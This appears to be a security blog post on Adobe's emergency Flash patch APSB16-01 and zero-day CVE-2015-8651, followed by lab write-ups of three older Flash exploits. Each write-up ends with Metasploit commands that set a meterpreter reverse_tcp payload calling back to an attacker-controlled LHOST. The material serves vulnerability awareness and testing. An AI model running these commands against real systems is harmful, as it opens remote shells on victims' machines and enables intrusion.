Emergency Patch APSB16-01 For Flash Player 0day CVE-2015-8651

Adobe has release, the December 28th 2015, an emergency patch for Adobe Flash Player dealing with 19 vulnerabilities. This security bulletin has a Critical severity rating.

APSB16-01 is concerning:

  • Adobe Flash Player Desktop Runtime 20.0.0.235 and earlier for Windows and Macintosh
  • Adobe Flash Player Extended Support Release 18.0.0.268 and earlier for Windows and Macintosh
  • Adobe Flash Player for Google Chrome 20.0.0.228 and earlier for Windows, Macintosh, Linux and ChromeOS
  • Adobe Flash Player for Microsoft Edge and Internet Explorer 11 20.0.0.228 and earlier for Windows 10
  • Adobe Flash Player for Internet Explorer 10 and 11 20.0.0.228 and earlier for Windows 8.0 and 8.1
  • Adobe Flash Player for Linux 11.2.202.554 and earlier for Linux
  • AIR Desktop Runtime 20.0.0.204 and earlier for Windows and Macintosh
  • AIR SDK 20.0.0.204 and earlier for Windows, Macintosh, Android and iOS
  • AIR SDK & Compiler 20.0.0.204 and earlier for Windows, Macintosh, Android and iOS
  • AIR for Android 20.0.0.204 and earlier for Android

In particular, a vulnerability with CVE-2015-8651 identifier, that has been discovered by Kai Wang and Hunter Gao of Huawei’s, is reporting exploited in the wild in limited targeted attacks. No details have been provided on this vulnerability, but surely it is time to patch otherwise why did Adobe release an emergency patch during Christmas period, a coordinated disclosure for limited targeted attacks would have been sufficient and could have wait beginning of January.

CVE-2014-0515 Adobe Flash Player Shader Buffer Overflow

Timeline :

Vulnerability discovered exploited in the wild in 2014-04-14 by Kaspersky Lab
Patched by the vendor via APSB14-13 the 2014–04-28
Windows Metasploit PoC provided the 2014-05-08
Vulnerability reported integrated into exploit kits the 2014-06-07
Multi platform Metasploit PoC provided the 2015-06-11

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2014-0515
BID-67092
APSB14-13

Affected version(s) :

Adobe Flash Player 13.0.0.182 and earlier versions for Windows
Adobe Flash Player 13.0.0.201 and earlier versions for Macintosh
Adobe Flash Player 11.2.202.350 and earlier versions for Linux

Tested on :

with Adobe Flash Player 13.0.0.182 (flashplayer13_0r0_182_winax.exe) and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on the following operating systems and Flash versions: Windows 7 SP1, IE 8 to IE 11 with Flash 13.0.0.182, Windows 7 SP1, Firefox 38.0.5, Flash 11.7.700.275 and Adobe Flash 13.0.0.182, Windows 8.1, Firefox 38.0.5 and Adobe Flash 13.0.0.182, Linux Mint “Rebecca” (32 bit), Firefox 33.0 and Adobe Flash 11.2.202.350

Commands :

use exploit/multi/browser/adobe_flash_pixel_bender_bof
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

CVE-2014-0497 Adobe Flash Player Integer Underflow Remote Code Execution

Timeline :

Vulnerability discovered exploited in the wild the 2014-02
Patched by the vendor via APSB14-04 the 2014-02-04
Vulnerability reported integrated into exploit kits the 2014-02
Metasploit PoC provided the 2014–05-04

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2014-0497
BID-65327
APSB14-04

Affected version(s) :

Adobe Flash Player 12.0.0.43 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.335 and earlier versions for Linux

Tested on :

with Flash Player 11.7.700.202 Active X version (flashplayer11_7r700_202_winax.exe) and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 12.0.0.43. By supplying a specially crafted swf file it is possible to trigger an integer underflow in several avm2 instructions, which can be turned into remote code execution under the context of the user, as exploited in the wild in February 2014. This module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8 even when it includes rop chains for several Flash 11 versions, as exploited in the wild.

Commands :

use exploit/windows/browser/adobe_flash_avm2
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-5331 Adobe Flash Player Type Confusion Remote Code Execution

Timeline :

Vulnerability discovered exploited in the wild the 2013-11
Patched by the vendor via APSB13-28 the 2013-12-10
Metasploit PoC provided the 2014–04-27

PoC provided by :

Unknown
bannedit
juan vazquez

Reference(s) :

CVE-2013-5331
BID-64199
APSB13-28

Affected version(s) :

Adobe Flash Player 11.9.900.152 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.327 and earlier versions for Linux

Tested on :

with Flash Player 11.9.900.152 Active X version (flashplayer11_9r900_152_winax.exe) and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits a type confusion vulnerability found in the ActiveX component of Adobe Flash Player. This vulnerability was found exploited in the wild in November 2013. This module has been tested successfully on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170 over Windows XP SP3 and Windows 7 SP1.

Commands :

use exploit/windows/browser/adobe_flash_filters_type_confusion
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo